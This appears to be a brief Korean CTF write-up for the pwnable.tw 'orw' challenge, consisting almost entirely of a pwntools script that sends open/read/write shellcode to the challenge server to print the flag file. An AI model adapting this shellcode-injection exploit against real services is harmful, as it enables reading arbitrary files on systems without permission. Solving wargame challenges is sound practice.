pwnable.tw - orw

쉘코딩 하면 덴다. from pwn import * r = remote("chall.pwnable.tw", 10001) e = ELF("orw") context.log_level = "debug" context(arch='i386', os='linux') pay = "" pay += asm(shellcraft.open('/home/orw/flag')) pay += asm(shellcraft.read('eax', e.bss()+0x100, 100)) pay += asm(shellcraft.write(1, e.bss()+0x100, 100)) r.recv() r.sendline(pay) r.interactive()

2021.08.31